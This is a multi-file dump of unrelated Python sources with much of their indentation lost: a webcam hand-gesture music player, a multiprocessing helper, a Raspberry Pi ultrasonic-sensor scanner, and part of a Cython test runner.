def inplayer():
self.root = tk.Tk()
self.root.geometry('600x400')
self.root.wm_title('Vison Audio')
self.app = Player.Player(master=self.root)
self.app.mainloop()
# getting Predictions: Thread2
def inpredict():
ptime = 0
cap = cv2.VideoCapture(0)
while True:
ret, self.img = cap.read()
self.img = cv2.flip(self.img, 1)
self.img = cv2.resize(self.img, (640,480), interpolation=cv2.INTER_AREA)
# print(self.img.shape)
if ret == False:
break
#Calculate FrameRate
self.detect(self.img)
self.ctime = time.time()
fps = 1 / (self.ctime - ptime)
ptime = self.ctime
cv2.putText(self.img, "framerate: "+str(int(fps)), (440, 120), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0,255,255), 2)
#Displaying Predictions
cv2.imshow("Gesture Detection", self.img)
k = cv2.waitKey(1)
if k == 27:
break
cv2.destroyAllWindows()
cap.release()
        # Multithreading: run the player UI and the gesture predictor in parallel
threading.Thread(target=inplayer).start()
threading.Thread(target=inpredict).start()
def detect(self,img):
self.prevmode=self.mode
self.handDetector.findHands(img)
self.lmlist=self.handDetector.findPosition(img)
if len(self.lmlist) != 0:
self.fingercount, self.fingerlist = self.handDetector.countTheFingersUp(img)
#For volume and changetrack modes
if self.fingerlist == [1,1,0,0,0]:
self.volmmode= True
elif self.fingerlist==[0 , 1, 1, 1, 1]:
self.changeTrackMode=True
else:
self.changeTrackMode=False
self.volmmode = False
self.changeTrackFlag=False
#For PlayPause
if self.fingerlist == [1, 1, 1, 1, 1]:
self.mode = "Play"
#Visualizations
cv2.rectangle(img, (0, 0), (img.shape[1], 80), (255, 0, 0), -1)
cv2.putText(img, "Playing: ", (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 72, 255), 2)
cv2.putText(img, os.path.basename(self.app.playlist[self.app.current]), (70, 60), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0,255,0), 2)
elif self.fingerlist == [0,0,0,0,0]:
self.mode= "Pause"
#Visualizations
cv2.rectangle(img, (0, 0), (img.shape[1], 80), (255, 0, 0), -1)
cv2.putText(img, "Paused", (180, 60), cv2.FONT_HERSHEY_TRIPLEX, 2, (0, 0, 255), 5)
for id in self.fingertipindex:
cv2.circle(self.img,(self.lmlist[id][1],self.lmlist[id][2]),4,(0,0,255),-1)
# call volume function
if self.volmmode== True:
self.changeVol(img)
# Call change track function
elif self.changeTrackMode== True:
cv2.rectangle(img, (0, 0), (img.shape[1], 80), (255, 0, 0), -1)
cv2.putText(img, "Change Track", (100,60), cv2.FONT_HERSHEY_SIMPLEX, 2, (0, 255, 0), 5)
p11 = (80, 20)
p12 = (50, 40)
p13 = (80, 60)
cv2.line(img, p11, p12, (0, 0, 255), 3)
cv2.line(img, p12, p13, (0, 0, 255), 3)
cv2.line(img, p13, p11, (0, 0, 255), 3)
p21 = (545, 20)
p22 = (575, 40)
p23 = (545, 60)
cv2.line(img, p21, p22, (0, 0, 255), 3)
cv2.line(img, p22, p23, (0, 0, 255), 3)
cv2.line(img, p23, p21, (0, 0, 255), 3)
for id in self.fingertipindex[1:]:
cv2.circle(self.img,(self.lmlist[id][1],self.lmlist[id][2]),4,(0,0,255),-1)
self.changeTrack()
# call function for play pause
else:
self.checkplaypause()
def checkplaypause(self):
if self.prevmode!= self.mode and self.mode=='Play' and self.app.paused== True: #For continue
self.app.pause_song()
elif self.prevmode!= self.mode and self.mode=='Pause' and self.app.paused == False: #For pause
self.app.pause_song()
def changeVol(self,img):
x1,y1= self.lmlist[4][1],self.lmlist[4][2]
x2, y2 = self.lmlist[8][1], self.lmlist[8][2]
dist = math.hypot(x2 - x1, y2 - y1)
lowerdist=50
maxdist=230
vol=np.interp(dist,[lowerdist,maxdist],[0,10])
self.app.change_volume_vision(vol)
# Visualizations
cv2.rectangle(img, (0, 0), (img.shape[1], 80),(255,0,0) , -1)
cv2.putText(img,"Change Volume",(60,60),cv2.FONT_HERSHEY_TRIPLEX,2,(0, 72, 255),5)
cv2.line(img, (x1, y1), (x2, y2), (0, 72, 255), 6)
cv2.circle(img, (x1, y1), 6, (0, 0, 255), -1)
cv2.circle(img, (x2, y2), 6, (0, 0, 255), -1)
scaleforrec = np.interp(dist, [lowerdist,maxdist], [400,120])
# print(scale)
if vol < 8:
cv2.rectangle(self.img, (20, 120), (60, 400), (0, 255, 0), 2)
cv2.rectangle(self.img, (20, 400), (60, int(scaleforrec)), (0, 255, 0), -1)
cv2.putText(self.img, "Volume", (10, 430), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0,255,0), 2)
cv2.putText(self.img, str(round(vol*10))+"%", (20, 110), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 255, 0), 2)
# print("<0.8")
elif vol >= 8:
cv2.rectangle(self.img, (20, 120), (60, 400), (0, 0,255), 2)
cv2.rectangle(self.img, (20, 400), (60, int(scaleforrec)), (0 ,0, 255), -1)
cv2.putText(self.img, "Volume", (10, 430), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1,(0, 0, 255), 2)
cv2.putText(self.img, str(round(vol*10))+"%", (20, 110), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
# print(">0.8")
def changeTrack(self):
self.timeMode[round(float(time.time()),1)]= self.lmlist[8][1]
try:
if len(self.timeMode)> 10:
if self.lmlist[8][1]< self.timeMode[round(float(time.time()),1)-1]-150 and self.changeTrackFlag==False:
self.app.prev_song()
self.changeTrackFlag=True
elif self.lmlist[8][1]> self.timeMode[round(float(time.time()),1)-1]+150 and self.changeTrackFlag==False:
self.app.next_song()
self.changeTrackFlag =True
except Exception as e:
pass
def main():
play=PlaybackDetector()
if __name__ == "__main__":
main()
|
Processing.py
|
#! /usr/bin/env python
#-----------------------------------------#
# Copyright [2015] [Kelcey Jamison-Damage]
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Imports
#-----------------------------------------------------------------------#
import sys, os, time
import time
from random import randint
from multiprocessing import Process, Pool, Queue
# Processing Class
#-----------------------------------------------------------------------#
class Processing(object):
"""docstring for Processing"""
def __init__(self):
super(Processing, self).__init__()
pass
# Processing wrapper methods
#-----------------------------------------------------------------------#
def create_queue(self):
queue = Queue()
return queue
def generate_pool(self, processes=4):
pool = Pool(processes)
return pool
def new_process_pool(self, pool, func, data):
result = pool.apply_async(func, data)
return result
def new_process(self, func, data):
process = Process(target=func, args=data)
process.start()
return process
def new_process_map(self, pool, func, data, data2='', data3=''):
result = pool.map(func, [data])
return result
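# Usage sketch (illustrative only, not part of the original module):
#
#   if __name__ == '__main__':
#       proc = Processing()
#       pool = proc.generate_pool(processes=2)
#       async_result = proc.new_process_pool(pool, pow, (2, 10))
#       print(async_result.get())                   # -> 1024
#       print(proc.new_process_map(pool, abs, -5))  # -> [5]
#
# Note that new_process_map() wraps `data` in a one-element list, so the mapped
# function is called exactly once; data2 and data3 are currently unused.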
|
ultrasonic.py
|
import RPi.GPIO as GPIO
import time
import threading
from servos import Servos, ServoEnd, ServoDirection
class DistanceSensors:
def __init__(self):
self.GPIO_FRONTTRIGGER = 20
self.GPIO_BACKTRIGGER = 5
self.GPIO_FRONTECHO = 6
self.GPIO_BACKECHO = 12
FRONTSERVO = 6
BACKSERVO = 7
#set GPIO direction (IN / OUT)
GPIO.setmode(GPIO.BCM)
GPIO.setup(self.GPIO_FRONTECHO, GPIO.IN)
GPIO.setup(self.GPIO_BACKECHO, GPIO.IN)
GPIO.setup(self.GPIO_FRONTTRIGGER, GPIO.OUT)
GPIO.output(self.GPIO_FRONTTRIGGER, False)
GPIO.setup(self.GPIO_BACKTRIGGER, GPIO.OUT)
GPIO.output(self.GPIO_BACKTRIGGER, False)
# initialise direction servos
self.servos = Servos(FRONTSERVO, BACKSERVO)
servoPositions = self.servos.FirstScanPosition()
self.frontServoDirection = servoPositions[0]
self.backServoDirection = servoPositions[1]
self.scannerActive = False
self.endthread = False
self.HistoryFront = [[0.0, 0.0, 0.0, 0.0, 0.0]]
self.HistoryBack = [[0.0, 0.0, 0.0, 0.0, 0.0]]
self.FrontDeltas = [[0.0, 0.0, 0.0, 0.0, 0.0]]
self.BackDeltas = [[0.0, 0.0, 0.0, 0.0, 0.0]]
self.FrontDeltaDelta = [0.0, 0.0, 0.0, 0.0, 0.0]
self.BackDeltaDelta = [0.0, 0.0, 0.0, 0.0, 0.0]
# initialise current distance readings
self.frontDistance = {
ServoDirection.Left: -1.0,
ServoDirection.OffLeft: -1.0,
ServoDirection.Ahead: -1.0,
ServoDirection.OffRight: -1.0,
ServoDirection.Right: -1.0
}
self.backDistance = {
ServoDirection.Left: -1.0,
ServoDirection.OffLeft: -1.0,
ServoDirection.Ahead: -1.0,
ServoDirection.OffRight: -1.0,
ServoDirection.Right: -1.0
}
time.sleep(1)
def UpdateStatistics(self):
if len(self.HistoryFront) == 1:
self.HistoryFront = [[self.frontDistance[ServoDirection.Left],
self.frontDistance[ServoDirection.OffLeft],
self.frontDistance[ServoDirection.Ahead],
self.frontDistance[ServoDirection.OffRight],
self.frontDistance[ServoDirection.Right]]]
self.HistoryBack = [[self.backDistance[ServoDirection.Left],
self.backDistance[ServoDirection.OffLeft],
self.backDistance[ServoDirection.Ahead],
self.backDistance[ServoDirection.OffRight],
self.backDistance[ServoDirection.Right]]]
self.HistoryFront += [[self.frontDistance[ServoDirection.Left],
self.frontDistance[ServoDirection.OffLeft],
self.frontDistance[ServoDirection.Ahead],
self.frontDistance[ServoDirection.OffRight],
self.frontDistance[ServoDirection.Right]]]
self.HistoryBack += [[self.backDistance[ServoDirection.Left],
self.backDistance[ServoDirection.OffLeft],
self.backDistance[ServoDirection.Ahead],
self.backDistance[ServoDirection.OffRight],
self.backDistance[ServoDirection.Right]]]
self.FrontDeltas += [[round(self.HistoryFront[-1][0] - self.HistoryFront[-2][0], 1),
round(self.HistoryFront[-1][1] - self.HistoryFront[-2][1], 1),
round(self.HistoryFront[-1][2] - self.HistoryFront[-2][2], 1),
round(self.HistoryFront[-1][3] - self.HistoryFront[-2][3], 1),
round(self.HistoryFront[-1][4] - self.HistoryFront[-2][4], 1)]]
self.BackDeltas += [[round(self.HistoryBack[-1][0] - self.HistoryBack[-2][0], 1),
round(self.HistoryBack[-1][1] - self.HistoryBack[-2][1], 1),
round(self.HistoryBack[-1][2] - self.HistoryBack[-2][2], 1),
round(self.HistoryBack[-1][3] - self.HistoryBack[-2][3], 1),
round(self.HistoryBack[-1][4] - self.HistoryBack[-2][4], 1)]]
# only keep the most recent 10 entries
if (len(self.HistoryFront) > 10):
del self.HistoryFront[0]
del self.HistoryBack[0]
del self.FrontDeltas[0]
del self.BackDeltas[0]
self.FrontDeltaDelta = [0.0, 0.0, 0.0, 0.0, 0.0]
self.BackDeltaDelta = [0.0, 0.0, 0.0, 0.0, 0.0]
for j in range(0, min(5, len(self.FrontDeltas))):
            for i in range(0, 5):  # cover all five scan directions
self.FrontDeltaDelta[i] += self.FrontDeltas[j][i]
self.BackDeltaDelta[i] += self.BackDeltas[j][i]
        for i in range(0, 5):  # cover all five scan directions
self.FrontDeltaDelta[i] = round(self.FrontDeltaDelta[i], 1)
self.BackDeltaDelta[i] = round(self.BackDeltaDelta[i], 1)
# threaded function
def GetDistance(self, delay):
while not(self.endthread):
frontError = backError = False
# Activate echo trigger (this is shared between front and rear sensors)
GPIO.output(self.GPIO_FRONTTRIGGER, True)
time.sleep(0.00001)
GPIO.output(self.GPIO_FRONTTRIGGER, False)
frontStartTime = frontStopTime = time.time()
while GPIO.input(self.GPIO_FRONTECHO) == 0:
frontStartTime = time.time()
if frontStartTime - frontStopTime > 0.02:
frontError = True
break
while GPIO.input(self.GPIO_FRONTECHO) == 1 and not(frontError):
frontStopTime = time.time()
if frontStopTime - frontStartTime > 0.02:
frontError = True
break
time.sleep(0.08)
# Activate echo trigger (this is shared between front and rear sensors)
GPIO.output(self.GPIO_BACKTRIGGER, True)
time.sleep(0.00001)
GPIO.output(self.GPIO_BACKTRIGGER, False)
backStartTime = backStopTime = time.time()
while GPIO.input(self.GPIO_BACKECHO) == 0:
backStartTime = time.time()
if backStartTime - backStopTime > 0.02:
backError = True
break
while GPIO.input(self.GPIO_BACKECHO) == 1 and not (backError):
backStopTime = time.time()
if backStopTime - backStartTime > 0.02:
backError = True
break
# time difference between start and return
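            # distance_cm = elapsed_seconds * 34300 / 2 (speed of sound ~343 m/s,
            # halved for the round trip), which is where the 17150 factor comes from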
frontdistance = (frontStopTime - frontStartTime) * 17150
backdistance = (backStopTime - backStartTime) * 17150
if frontdistance > 0 and not(frontError):
self.frontDistance[self.frontServoDirection] = frontdistance
if backdistance> 0 and not(backError):
self.backDistance[self.backServoDirection] = backdistance
if (self.frontServoDirection == ServoDirection.Left):
self.UpdateStatistics()
# move servos to next direction to scan
servoDirections = self.servos.NextScanPosition()
self.frontServoDirection = servoDirections[0]
self.backServoDirection = servoDirections[1]
time.sleep(delay)
def StartScanner(self, delay, getFirstScan = False):
self.endthread = False
self.ultrathread = threading.Thread(target=self.GetDistance, args=(delay,))
self.ultrathread.start()
self.scannerActive = True
if getFirstScan:
done = False
attempts = 3
while not(done) and attempts > 0:
time.sleep(delay * 5)
done = True
for key in self.frontDistance:
if self.frontDistance[key] == -1.0:
done = False
for key in self.backDistance:
if self.backDistance[key] == -1.0:
done = False
attempts -= 1
return done
else:
return True
def StopScanner(self):
self.endthread = True
self.ultrathread.join()
self.scannerActive = False
try:
sensors = DistanceSensors()
sensors.StartScanner(0.1, True)
while sensors.scannerActive:
# if keyboard.read_key() == 'e':
# sensors.StopScanner()
# print("Front")
# print(sensors.frontDistance)
# print("back")
# print(sensors.backDistance)
time.sleep(1)
print("Back", sensors.BackDeltaDelta, sensors.BackDeltas[-1])
print("Front", sensors.FrontDeltaDelta, sensors.FrontDeltas[-1])
# Reset by pressing CTRL + C
except KeyboardInterrupt:
sensors.StopScanner()
finally:
GPIO.cleanup()
|
runtests.py
|
#!/usr/bin/env python
from __future__ import print_function
import atexit
import base64
import os
import sys
import re
import gc
import heapq
import locale
import shutil
import time
import unittest
import doctest
import operator
import subprocess
import tempfile
import traceback
import warnings
import zlib
import glob
from contextlib import contextmanager
try:
import platform
IS_PYPY = platform.python_implementation() == 'PyPy'
IS_CPYTHON = platform.python_implementation() == 'CPython'
except (ImportError, AttributeError):
IS_CPYTHON = True
IS_PYPY = False
IS_PY2 = sys.version_info[0] < 3
from io import open as io_open
try:
from StringIO import StringIO
except ImportError:
from io import StringIO # doesn't accept 'str' in Py2
try:
import cPickle as pickle
except ImportError:
import pickle
try:
import threading
except ImportError: # No threads, no problems
threading = None
try:
from collections import defaultdict
except ImportError:
class defaultdict(object):
def __init__(self, default_factory=lambda : None):
self._dict = {}
self.default_factory = default_factory
def __getitem__(self, key):
if key not in self._dict:
self._dict[key] = self.default_factory()
return self._dict[key]
def __setitem__(self, key, value):
self._dict[key] = value
def __contains__(self, key):
return key in self._dict
def __repr__(self):
return repr(self._dict)
def __nonzero__(self):
return bool(self._dict)
try:
from unittest import SkipTest
except ImportError:
class SkipTest(Exception): # don't raise, only provided to allow except-ing it!
pass
def skip_test(reason):
sys.stderr.write("Skipping test: %s\n" % reason)
else:
def skip_test(reason):
raise SkipTest(reason)
try:
basestring
except NameError:
basestring = str
WITH_CYTHON = True
CY3_DIR = None
from distutils.command.build_ext import build_ext as _build_ext
from distutils import sysconfig
from distutils import ccompiler
_to_clean = []
@atexit.register
def _cleanup_files():
"""
This is only used on Cygwin to clean up shared libraries that are unsafe
to delete while the test suite is running.
"""
for filename in _to_clean:
if os.path.isdir(filename):
shutil.rmtree(filename, ignore_errors=True)
else:
try:
os.remove(filename)
except OSError:
pass
def get_distutils_distro(_cache=[]):
if _cache:
return _cache[0]
# late import to accommodate for setuptools override
from distutils.dist import Distribution
distutils_distro = Distribution()
if sys.platform == 'win32':
# TODO: Figure out why this hackery (see https://thread.gmane.org/gmane.comp.python.cython.devel/8280/).
config_files = distutils_distro.find_config_files()
try:
config_files.remove('setup.cfg')
except ValueError:
pass
distutils_distro.parse_config_files(config_files)
cfgfiles = distutils_distro.find_config_files()
try:
cfgfiles.remove('setup.cfg')
except ValueError:
pass
distutils_distro.parse_config_files(cfgfiles)
_cache.append(distutils_distro)
return distutils_distro
EXT_DEP_MODULES = {
'tag:numpy': 'numpy',
'tag:pythran': 'pythran',
'tag:setuptools': 'setuptools.sandbox',
'tag:asyncio': 'asyncio',
'tag:pstats': 'pstats',
'tag:posix': 'posix',
'tag:array': 'array',
'tag:coverage': 'Cython.Coverage',
'Coverage': 'Cython.Coverage',
'tag:ipython': 'IPython.testing.globalipapp',
'tag:jedi': 'jedi_BROKEN_AND_DISABLED',
'tag:test.support': 'test.support', # support module for CPython unit tests
}
def patch_inspect_isfunction():
import inspect
orig_isfunction = inspect.isfunction
def isfunction(obj):
return orig_isfunction(obj) or type(obj).__name__ == 'cython_function_or_method'
isfunction._orig_isfunction = orig_isfunction
inspect.isfunction = isfunction
def unpatch_inspect_isfunction():
import inspect
try:
orig_isfunction = inspect.isfunction._orig_isfunction
except AttributeError:
pass
else:
inspect.isfunction = orig_isfunction
def def_to_cdef(source):
'''
Converts the module-level def methods into cdef methods, i.e.
@decorator
def foo([args]):
"""
[tests]
"""
[body]
becomes
def foo([args]):
"""
[tests]
"""
return foo_c([args])
cdef foo_c([args]):
[body]
'''
output = []
skip = False
def_node = re.compile(r'def (\w+)\(([^()*]*)\):').match
lines = iter(source.split('\n'))
for line in lines:
if not line.strip():
output.append(line)
continue
if skip:
if line[0] != ' ':
skip = False
else:
continue
if line[0] == '@':
skip = True
continue
m = def_node(line)
if m:
name = m.group(1)
args = m.group(2)
if args:
args_no_types = ", ".join(arg.split()[-1] for arg in args.split(','))
else:
args_no_types = ""
output.append("def %s(%s):" % (name, args_no_types))
line = next(lines)
if '"""' in line:
has_docstring = True
output.append(line)
for line in lines:
output.append(line)
if '"""' in line:
break
else:
has_docstring = False
output.append(" return %s_c(%s)" % (name, args_no_types))
output.append('')
output.append("cdef %s_c(%s):" % (name, args))
if not has_docstring:
output.append(line)
else:
output.append(line)
return '\n'.join(output)
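# Illustrative example (not part of the original test runner):
#   def_to_cdef("def add(int a, int b):\n    return a + b\n")
# produces (roughly):
#   def add(a, b):
#       return add_c(a, b)
#
#   cdef add_c(int a, int b):
#       return a + b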
def exclude_extension_in_pyver(*versions):
def check(ext):
return EXCLUDE_EXT if sys.version_info[:2] in versions else ext
return check
def exclude_extension_on_platform(*platforms):
def check(ext):
return EXCLUDE_EXT if sys.platform in platforms else ext
return check
def update_linetrace_extension(ext):
ext.define_macros.append(('CYTHON_TRACE', 1))
return ext
def update_numpy_extension(ext, set_api17_macro=True):
import numpy
from numpy.distutils.misc_util import get_info
ext.include_dirs.append(numpy.get_include())
if set_api17_macro:
ext.define_macros.append(('NPY_NO_DEPRECATED_API', 'NPY_1_7_API_VERSION'))
# We need the npymath library for numpy.math.
# This is typically a static-only library.
for attr, value in get_info('npymath').items():
getattr(ext, attr).extend(value)
def update_openmp_extension(ext):
ext.openmp = True
language = ext.language
if sys.platform == 'win32' and sys.version_info[:2] == (3,4):
# OpenMP tests fail in appveyor in Py3.4 -> just ignore them, EoL of Py3.4 is early 2019...
return EXCLUDE_EXT
if language == 'cpp':
flags = OPENMP_CPP_COMPILER_FLAGS
else:
flags = OPENMP_C_COMPILER_FLAGS
if flags:
compile_flags, link_flags = flags
ext.extra_compile_args.extend(compile_flags.split())
ext.extra_link_args.extend(link_flags.split())
return ext
elif sys.platform == 'win32':
return ext
return EXCLUDE_EXT
def update_cpp11_extension(ext):
"""
update cpp11 extensions that will run on versions of gcc >4.8
"""
gcc_version = get_gcc_version(ext.language)
if gcc_version:
compiler_version = gcc_version.group(1)
        if tuple(map(int, compiler_version.split('.'))) > (4, 8):
ext.extra_compile_args.append("-std=c++11")
return ext
clang_version = get_clang_version(ext.language)
if clang_version:
ext.extra_compile_args.append("-std=c++11")
if sys.platform == "darwin":
ext.extra_compile_args.append("-stdlib=libc++")
ext.extra_compile_args.append("-mmacosx-version-min=10.7")
return ext
return EXCLUDE_EXT
def get_cc_version(language):
"""
finds gcc version using Popen
"""
if language == 'cpp':
cc = sysconfig.get_config_var('CXX')
else:
cc = sysconfig.get_config_var('CC')
if not cc:
cc = ccompiler.get_default_compiler()
if not cc:
return ''
# For some reason, cc can be e.g. 'gcc -pthread'
cc = cc.split()[0]
# Force english output
env = os.environ.copy()
env['LC_MESSAGES'] = 'C'
try:
p = subprocess.Popen([cc, "-v"], stderr=subprocess.PIPE, env=env)
except EnvironmentError:
# Be compatible with Python 3
warnings.warn("Unable to find the %s compiler: %s: %s" %
(language, os.strerror(sys.exc_info()[1].errno), cc))
return ''
_, output = p.communicate()
return output.decode(locale.getpreferredencoding() or 'ASCII', 'replace')
def get_gcc_version(language):
matcher = re.compile(r"gcc version (\d+\.\d+)").search
return matcher(get_cc_version(language))
def get_clang_version(language):
matcher = re.compile(r"clang(?:-|\s+version\s+)(\d+\.\d+)").search
return matcher(get_cc_version(language))
def get_openmp_compiler_flags(language):
"""
As of gcc 4.2, it supports OpenMP 2.5. Gcc 4.4 implements 3.0. We don't
(currently) check for other compilers.
returns a two-tuple of (CFLAGS, LDFLAGS) to build the OpenMP extension
"""
gcc_version = get_gcc_version(language)
if not gcc_version:
if sys.platform == 'win32':
return '/openmp', ''
else:
return None # not gcc - FIXME: do something about other compilers
# gcc defines "__int128_t", assume that at least all 64 bit architectures have it
global COMPILER_HAS_INT128
COMPILER_HAS_INT128 = getattr(sys, 'maxsize', getattr(sys, 'maxint', 0)) > 2**60
compiler_version = gcc_version.group(1)
    if compiler_version and tuple(map(int, compiler_version.split('.'))) >= (4, 2):
return '-fopenmp', '-fopenmp'
try:
locale.setlocale(locale.LC_ALL, '')
except locale.Error:
pass
COMPILER = None
COMPILER_HAS_INT128 = False
OPENMP_C_COMPILER_FLAGS = get_openmp_compiler_flags('c')
OPENMP_CPP_COMPILER_FLAGS = get_openmp_compiler_flags('cpp')
# Return this from the EXT_EXTRAS matcher callback to exclude the extension
EXCLUDE_EXT = object()
EXT_EXTRAS = {
'tag:numpy' : update_numpy_extension,
'tag:openmp': update_openmp_extension,
'tag:cpp11': update_cpp11_extension,
'tag:trace' : update_linetrace_extension,
'tag:bytesformat': exclude_extension_in_pyver((3, 3), (3, 4)), # no %-bytes formatting
'tag:no-macos': exclude_extension_on_platform('darwin'),
}
# TODO: use tags
VER_DEP_MODULES = {
# tests are excluded if 'CurrentPythonVersion OP VersionTuple', i.e.
# (2,4) : (operator.lt, ...) excludes ... when PyVer < 2.4.x
# The next line should start (3,); but this is a dictionary, so
# we can only have one (3,) key. Since 2.7 is supposed to be the
# last 2.x release, things would have to change drastically for this
# to be unsafe...
(2,999): (operator.lt, lambda x: x in ['run.special_methods_T561_py3',
'run.test_raisefrom',
'run.different_package_names',
'run.unicode_imports', # encoding problems on appveyor in Py2
'run.reimport_failure', # reimports don't do anything in Py2
]),
(3,): (operator.ge, lambda x: x in ['run.non_future_division',
'compile.extsetslice',
'compile.extdelslice',
'run.special_methods_T561_py2',
]),
(3,3) : (operator.lt, lambda x: x in ['build.package_compilation',
'build.cythonize_pep420_namespace',
'run.yield_from_py33',
'pyximport.pyximport_namespace',
'run.qualname',
]),
(3,4): (operator.lt, lambda x: x in ['run.py34_signature',
'run.test_unicode', # taken from Py3.7, difficult to backport
]),
(3,4,999): (operator.gt, lambda x: x in ['run.initial_file_path',
]),
(3,5): (operator.lt, lambda x: x in ['run.py35_pep492_interop',
'run.py35_asyncio_async_def',
'run.mod__spec__',
'run.pep526_variable_annotations', # typing module
'run.test_exceptions', # copied from Py3.7+
]),
}
INCLUDE_DIRS = [ d for d in os.getenv('INCLUDE', '').split(os.pathsep) if d ]
CFLAGS = os.getenv('CFLAGS', '').split()
CCACHE = os.getenv('CYTHON_RUNTESTS_CCACHE', '').split()
TEST_SUPPORT_DIR = 'testsupport'
BACKENDS = ['c', 'cpp']
UTF8_BOM_BYTES = r'\xef\xbb\xbf'.encode('ISO-8859-1').decode('unicode_escape')
def memoize(f):
uncomputed = object()
f._cache = {}
def func(*args):
res = f._cache.get(args, uncomputed)
if res is uncomputed:
res = f._cache[args] = f(*args)
return res
return func
@memoize
def parse_tags(filepath):
tags = defaultdict(list)
parse_tag = re.compile(r'#\s*(\w+)\s*:(.*)$').match
with io_open(filepath, encoding='ISO-8859-1', errors='ignore') as f:
for line in f:
# ignore BOM-like bytes and whitespace
line = line.lstrip(UTF8_BOM_BYTES).strip()
if not line:
if tags:
break # assume all tags are in one block
else:
continue
if line[0] != '#':
break
parsed = parse_tag(line)
if parsed:
tag, values = parsed.groups()
if tag in ('coding', 'encoding'):
continue
if tag == 'tags':
tag = 'tag'
print("WARNING: test tags use the 'tag' directive, not 'tags' (%s)" % filepath)
if tag not in ('mode', 'tag', 'ticket', 'cython', 'distutils', 'preparse'):
print("WARNING: unknown test directive '%s' found (%s)" % (tag, filepath))
values = values.split(',')
tags[tag].extend(filter(None, [value.strip() for value in values]))
elif tags:
break # assume all tags are in one block
return tags
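# Illustrative example (not part of the original test runner): for a test file whose
# leading comment block contains
#   # mode: run
#   # tag: numpy, openmp
# parse_tags() returns a defaultdict(list) roughly equal to
#   {'mode': ['run'], 'tag': ['numpy', 'openmp']}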
list_unchanging_dir = memoize(lambda x: os.listdir(x))
@memoize
def _list_pyregr_data_files(test_directory):
is_data_file = re.compile('(?:[.](txt|pem|db|html)|^bad.*[.]py)$').search
return ['__init__.py'] + [
filename for filename in list_unchanging_dir(test_directory)
if is_data_file(filename)]
def import_ext(module_name, file_path=None):
if file_path:
import imp
return imp.load_dynamic(module_name, file_path)
else:
try:
from importlib import invalidate_caches
except ImportError:
pass
else:
invalidate_caches()
return __import__(module_name, globals(), locals(), ['*'])
class build_ext(_build_ext):
def build_extension(self, ext):
try:
try: # Py2.7+ & Py3.2+
compiler_obj = self.compiler_obj
except AttributeError:
compiler_obj = self.compiler
if ext.language == 'c++':
compiler_obj.compiler_so.remove('-Wstrict-prototypes')
if CCACHE:
compiler_obj.compiler_so = CCACHE + compiler_obj.compiler_so
if getattr(ext, 'openmp', None) and compiler_obj.compiler_type == 'msvc':
ext.extra_compile_args.append('/openmp')
except Exception:
pass
_build_ext.build_extension(self, ext)
class ErrorWriter(object):
match_error = re.compile(r'(warning:)?(?:.*:)?\s*([-0-9]+)\s*:\s*([-0-9]+)\s*:\s*(.*)').match
def __init__(self, encoding=None):
self.output = []
self.encoding = encoding
def write(self, value):
if self.encoding:
value = value.encode('ISO-8859-1').decode(self.encoding)
self.output.append(value)
def _collect(self):
s = ''.join(self.output)
results = {'errors': [], 'warnings': []}
for line in s.splitlines():
match = self.match_error(line)
if match:
is_warning, line, column, message = match.groups()
results['warnings' if is_warning else 'errors'].append((int(line), int(column), message.strip()))
return [["%d:%d: %s" % values for values in sorted(results[key])] for key in ('errors', 'warnings')]
def geterrors(self):
return self._collect()[0]
def getwarnings(self):
return self._collect()[1]
def getall(self):
return self._collect()
def close(self):
pass # ignore, only to match file-like interface
class Stats(object):
def __init__(self, top_n=8):
self.top_n = top_n
self.test_counts = defaultdict(int)
self.test_times = defaultdict(float)
self.top_tests = defaultdict(list)
def add_time(self, name, language, metric, t):
self.test_counts[metric] += 1
self.test_times[metric] += t
top = self.top_tests[metric]
push = heapq.heappushpop if len(top) >= self.top_n else heapq.heappush
# min-heap => pop smallest/shortest until longest times remain
push(top, (t, name, language))
@contextmanager
def time(self, name, language, metric):
t = time.time()
yield
t = time.time() - t
self.add_time(name, language, metric, t)
def update(self, stats):
# type: (Stats) -> None
for metric, t in stats.test_times.items():
self.test_times[metric] += t
self.test_counts[metric] += stats.test_counts[metric]
top = self.top_tests[metric]
for entry in stats.top_tests[metric]:
push = heapq.heappushpop if len(top) >= self.top_n else heapq.heappush
push(top, entry)
def print_stats(self, out=sys.stderr):
if not self.test_times:
return
lines = ['Times:\n']
for metric, t in sorted(self.test_times.items()):
count = self.test_counts[metric]
top = self.top_tests[metric]
lines.append("%-12s: %8.2f sec (%4d, %6.3f / run) - slowest: %s\n" % (
metric, t, count, t / count,
', '.join("'{2}:{1}' ({0:.2f}s)".format(*item) for item in heapq.nlargest(self.top_n, top))))
out.write(''.join(lines))
class TestBuilder(object):
def __init__(self, rootdir, workdir, selectors, exclude_selectors, options,
with_pyregr, languages, test_bugs, language_level,
common_utility_dir, pythran_dir=None,
default_mode='run', stats=None,
add_embedded_test=False):
self.rootdir = rootdir
self.workdir = workdir
self.selectors = selectors
self.exclude_selectors = exclude_selectors
self.annotate = options.annotate_source
self.cleanup_workdir = options.cleanup_workdir
self.cleanup_sharedlibs = options.cleanup_sharedlibs
self.cleanup_failures = options.cleanup_failures
self.with_pyregr = with_pyregr
self.cython_only = options.cython_only
self.languages = languages
self.test_bugs = test_bugs
self.fork = options.fork
self.language_level = language_level
self.test_determinism = options.test_determinism
self.common_utility_dir = common_utility_dir
self.pythran_dir = pythran_dir
self.default_mode = default_mode
self.stats = stats
self.add_embedded_test = add_embedded_test
self.capture = options.capture
def build_suite(self):
suite = unittest.TestSuite()
filenames = os.listdir(self.rootdir)
filenames.sort()
for filename in filenames:
path = os.path.join(self.rootdir, filename)
if os.path.isdir(path) and filename != TEST_SUPPORT_DIR:
if filename == 'pyregr' and not self.with_pyregr:
continue
if filename == 'broken' and not self.test_bugs:
continue
suite.addTest(
self.handle_directory(path, filename))
